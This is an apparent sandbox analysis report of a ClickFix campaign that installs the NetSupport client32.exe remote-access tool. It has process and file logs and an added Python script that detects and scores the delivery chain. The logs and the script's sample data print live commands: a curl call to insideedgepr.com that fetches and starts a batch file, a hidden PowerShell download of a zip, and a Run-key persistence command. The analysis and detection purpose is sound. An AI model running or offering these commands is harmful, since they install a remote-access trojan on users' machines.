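Run it against the real drops by reading each file's bytes into triage(); on a hit, pair the section-name finding with the PDB path the report extracted from the same file (E:\nsmsrc\nsm\... for the NetSupport components, a MinGW layout for the FFmpeg libraries) before treating it as obfuscation.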

Persistence and Installation Behavior

Source: Chrome DOM: 0.2 OCR Text: www.focuslight.com Verify you are human by completing the action below Verifying... www.focuslight.com needs to review the security of your connection before proceeding. Complete these verification steps use keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key on your keyboard Ray ID: iql Iz6kqha Performance and security by Cloudflare
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Clipboard modification: C:\WINDOWS\system32\cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat" && start /min "" "C:\ProgramData\xss.bat" Press Enter
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created (driver file): itvwd64.sys in each of C:\Users\user\AppData\Roaming\Directory\kpodja, \mirvfa, \gehrga, \katrga, \nkakus and \tailji
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created (dropped files) in C:\Users\user\AppData\Roaming\Directory\: client32.exe, TCCTL32.DLL, branding.dll, pcicapi.dll, PCICHEK.DLL, PCICL32.DLL, HTCTL32.DLL, msvcr100.dll, remcmdstub.exe, hw.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created (dropped files) in each of the subdirectories kpodja, mirvfa, gehrga, katrga, nkakus and tailji under C:\Users\user\AppData\Roaming\Directory\: itvwd64.sys, avcodec-53.dll, avutil-51.dll, libstdc++-6.dll
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Program_Cs1 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 776
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4889
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4870
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2158
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4033
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\nkakus\avcodec-53.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\TCCTL32.DLL
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\tailji\avcodec-53.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\gehrga\avcodec-53.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\branding.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\kpodja\avcodec-53.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\nkakus\avutil-51.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\kpodja\itvwd64.sys
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\katrga\libstdc++-6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\nkakus\itvwd64.sys
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\kpodja\libstdc++-6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\mirvfa\avcodec-53.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\tailji\avutil-51.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\katrga\avcodec-53.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\gehrga\avutil-51.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\katrga\itvwd64.sys
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\mirvfa\avutil-51.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\gehrga\libstdc++-6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\tailji\libstdc++-6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\kpodja\avutil-51.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\gehrga\itvwd64.sys
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\HTCTL32.DLL
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\mirvfa\libstdc++-6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\nkakus\libstdc++-6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\remcmdstub.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\tailji\itvwd64.sys
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\mirvfa\itvwd64.sys
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\katrga\avutil-51.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Directory\hw.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6140 Thread sleep count: 4889 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6100 Thread sleep count: 4870 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 712 Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4496 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3888 Thread sleep count: 2158 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3888 Thread sleep count: 4033 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2164 Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2336 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: client32.exe, 0000001D.00000002.2017612312.00000000008BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: HTCTL32.DLL.28.dr Binary or memory string: VMware
Source: client32.exe, 00000021.00000003.1890131129.000000000137D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
Source: chromecache_249.2.dr Binary or memory string: KycyLD0Zix2BvaIjRuxI4HfREQu4HG7pHgFsGR0x8e7eyh+jI0boYQzL2cfkjS6qGJ/eymeBr0Z3
Source: HTCTL32.DLL.28.dr Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: avutil-51.dll1.28.dr Binary or memory string: xvmcidct
Source: HTCTL32.DLL.28.dr Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: HTCTL32.DLL.28.dr Binary or memory string: VMWare
Source: avutil-51.dll1.28.dr Binary or memory string: Cbgrargbargb32bgr32le%s%sname nb_components nb_bits%-11s %7d %10dyuv420pyuyv422rgb24bgr24yuv422pyuv444pyuv410pyuv411pgraymonowmonobpal8yuvj420pyuvj422pyuvj444pxvmcmcxvmcidctuyvy422uyyvyy411bgr8bgr4bgr4_bytergb8rgb4rgb4_bytenv12nv21argbabgrgray16begray16leyuv440pyuvj440pyuva420pvdpau_h264vdpau_mpeg1vdpau_mpeg2vdpau_wmv3vdpau_vc1rgb48bergb48lergb565bergb565lergb555bergb555lebgr565bebgr565lebgr555bebgr555levaapi_mocovaapi_idctvaapi_vldyuv420p16leyuv420p16beyuv422p16leyuv422p16beyuv444p16leyuv444p16bevdpau_mpeg4dxva2_vldrgb444lergb444bebgr444lebgr444begray8abgr48bebgr48leyuv420p9beyuv420p9leyuv420p10beyuv420p10leyuv422p10beyuv422p10leyuv444p9beyuv444p9leyuv444p10beyuv444p10lep
Source: client32.exe, 0000001D.00000002.2022624501.000000006C090000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.clal*
Source: curl.exe, 00000018.00000003.1577949341.0000000002960000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000022.00000002.1973008502.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000022.00000003.1971676129.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\WINDOWS\system32\cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\ProgramData\xss.bat" Press Enter
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" -o "C:\ProgramData\xss.bat"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781' -OutFile 'C:\Users\user\AppData\Roaming\Program.zip'"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Program.zip', 'C:\Users\user\AppData\Roaming\Directory')"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\Directory\client32.exe "C:\Users\user\AppData\Roaming\Directory\client32.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Program_Cs1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Directory\client32.exe" /f
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /k c:\windows\system32\cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c:\windows\system32\curl.exe -k -ss -x post "https://www.insideedgepr.com/header.php" -o "c:\programdata\xss.bat" && start /min "" "c:\programdata\xss.bat" press enter
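The process-creation records above are the whole ClickFix delivery chain in order: the clipboard command pasted by the victim (nested cmd /c wrappers ending in "press enter"), curl with -k (certificate checking disabled) fetching a .bat into C:\ProgramData, a hidden PowerShell Invoke-WebRequest pulling a zip into AppData\Roaming, ZipFile::ExtractToDirectory unpacking it, the NetSupport client32.exe starting from that directory, and reg.exe writing an HKCU Run value pointing at it. The Python below is an added example, not part of this report or of any vendor tooling: it unwraps the nested cmd layers, pulls the URLs and output paths out as IOCs, and scores a logon session on how many links of that chain appear. The sample records are constructed to mirror the command lines above (plus one benign curl download as a control); the record layout (session, parent image, image, command line), the indicator names and the alert threshold are assumptions.

```python
"""Score process-creation command lines (Sysmon Event ID 1 / Security 4688
style) for the ClickFix -> curl -> .bat -> PowerShell -> NetSupport chain.

SAMPLE_EVENTS is constructed for this example and mirrors the report's
command lines; the (session, parent, image, cmdline) layout is an assumption."""
import re

SAMPLE_EVENTS = [  # constructed sample records
    ("s1", "explorer.exe", "cmd.exe",
     r'cmd /k c:\windows\system32\cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c '
     r'c:\windows\system32\curl.exe -k -ss -x post "https://www.insideedgepr.com/header.php" '
     r'-o "c:\programdata\xss.bat" && start /min "" "c:\programdata\xss.bat" press enter'),
    ("s1", "cmd.exe", "cmd.exe",
     r'C:\Windows\system32\cmd.exe /K "C:\ProgramData\xss.bat" Press Enter'),
    ("s1", "cmd.exe", "curl.exe",
     r'C:\WINDOWS\system32\curl.exe -k -Ss -X POST "https://www.insideedgepr.com/header.php" '
     r'-o "C:\ProgramData\xss.bat"'),
    ("s1", "cmd.exe", "powershell.exe",
     "powershell -WindowStyle Hidden -Command \"Invoke-WebRequest -Uri "
     "'https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781' "
     "-OutFile 'C:\\Users\\user\\AppData\\Roaming\\Program.zip'\""),
    ("s1", "cmd.exe", "powershell.exe",
     "powershell -WindowStyle Hidden -Command \"Add-Type -AssemblyName "
     "'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory("
     "'C:\\Users\\user\\AppData\\Roaming\\Program.zip', "
     "'C:\\Users\\user\\AppData\\Roaming\\Directory')\""),
    ("s1", "cmd.exe", "client32.exe",
     r'"C:\Users\user\AppData\Roaming\Directory\client32.exe"'),
    ("s1", "cmd.exe", "reg.exe",
     r'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" '
     r'/v "Program_Cs1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Directory\client32.exe" /f'),
    # control: an admin fetching an archive with curl, certificate checks left on
    ("s2", "cmd.exe", "curl.exe",
     r'curl.exe -L https://example.org/tool.zip -o C:\Users\admin\Downloads\tool.zip'),
]

SCRIPT_EXT = (".bat", ".cmd", ".ps1", ".vbs", ".js")
_WRAPPER = re.compile(r'^\s*"?(?:[a-z]:\\windows\\system32\\)?cmd(?:\.exe)?"?\s+/[kc]\s+', re.I)
_OUTFILE = re.compile(r'(?:-o|-OutFile)\s+(?:["\']([^"\']+)["\']|(\S+))', re.I)
_URL = re.compile(r'https?://[^\s"\']+', re.I)
_CURL_INSECURE = re.compile(r'(?:^|\s)-k(?:\s|$)')  # curl -k: TLS verification off

def unwrap_cmd(cmdline):
    """Peel nested `cmd /c` / `cmd /k` wrappers; return (innermost command, depth)."""
    depth = 0
    while True:
        m = _WRAPPER.match(cmdline)
        if not m:
            return cmdline.strip(), depth
        cmdline = cmdline[m.end():]
        depth += 1

def extract_outfile(cmdline):
    """Return the path given to curl -o / Invoke-WebRequest -OutFile, or None."""
    m = _OUTFILE.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None

def classify(image, cmdline):
    """Return the set of indicator names that one process-creation record triggers."""
    inner, depth = unwrap_cmd(cmdline)
    low = inner.lower()
    image = image.rsplit("\\", 1)[-1].lower()
    outfile = extract_outfile(inner)
    hits = set()
    if depth >= 2:
        hits.add("nested_cmd_wrappers")
    if low.rstrip().endswith("press enter"):          # lure text pasted with the command
        hits.add("clickfix_tail_text")
    if ("curl" in low and _CURL_INSECURE.search(inner) and outfile
            and outfile.lower().endswith(SCRIPT_EXT)):
        hits.add("curl_insecure_fetch_to_script")
    if image == "cmd.exe" and re.search(r'\\programdata\\[^\s"]+\.(?:bat|cmd)', low):
        hits.add("cmd_runs_script_from_programdata")
    if image == "powershell.exe" and "-windowstyle hidden" in low and "invoke-webrequest" in low:
        hits.add("hidden_powershell_web_download")
    if image == "powershell.exe" and "extracttodirectory" in low:
        hits.add("powershell_zip_extract")
    if image == "client32.exe" and "\\appdata\\roaming\\" in low:
        hits.add("netsupport_client_from_appdata")
    if image == "reg.exe" and "currentversion\\run" in low and " /d " in low:
        hits.add("run_key_persistence_via_reg")
    return hits

def score_sessions(events, threshold=4):
    """Aggregate indicators per session and collect URLs / output paths as IOCs."""
    sessions = {}
    for session, _parent, image, cmdline in events:
        s = sessions.setdefault(session, {"hits": set(), "urls": set(), "files": set()})
        s["hits"] |= classify(image, cmdline)
        inner, _ = unwrap_cmd(cmdline)
        s["urls"].update(_URL.findall(inner))
        out = extract_outfile(inner)
        if out:
            s["files"].add(out.lower())
    for s in sessions.values():
        s["score"] = len(s["hits"])
        s["suspicious"] = s["score"] >= threshold    # threshold is an assumption; tune it
        s["urls"], s["files"] = sorted(s["urls"]), sorted(s["files"])
    return sessions

if __name__ == "__main__":
    for name, s in score_sessions(SAMPLE_EVENTS).items():
        print(name, "SUSPICIOUS" if s["suspicious"] else "ok", s["score"], sorted(s["hits"]))
        for u in s["urls"]:
            print("   url ", u)
        for f in s["files"]:
            print("   file", f)
```

Each indicator on its own is noisy (admins do use curl -o and reg add), which is why the score is per session rather than per event: the benign control session scores zero while the report's chain trips every indicator. Two caveats: the -k check only matches the flag on its own, so a combined form such as -ksS would need the regex widened, and the wrapper regex only peels cmd.exe launched by name or from the system32 path, not via %ComSpec% or other aliases.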
Source: client32.exe, 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: client32.exe, 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: Shell_TrayWnd
Source: client32.exe, 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: Progman
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Queries volume information: C:\ VolumeInformation
Source: Yara match File source: 00000022.00000002.1973402402.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2020043160.0000000002A72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.1973680770.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.1888686094.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.1969236658.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.1763409289.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2019779438.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.1973008502.0000000000C18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2021916267.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1891661737.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, type: MEMORY
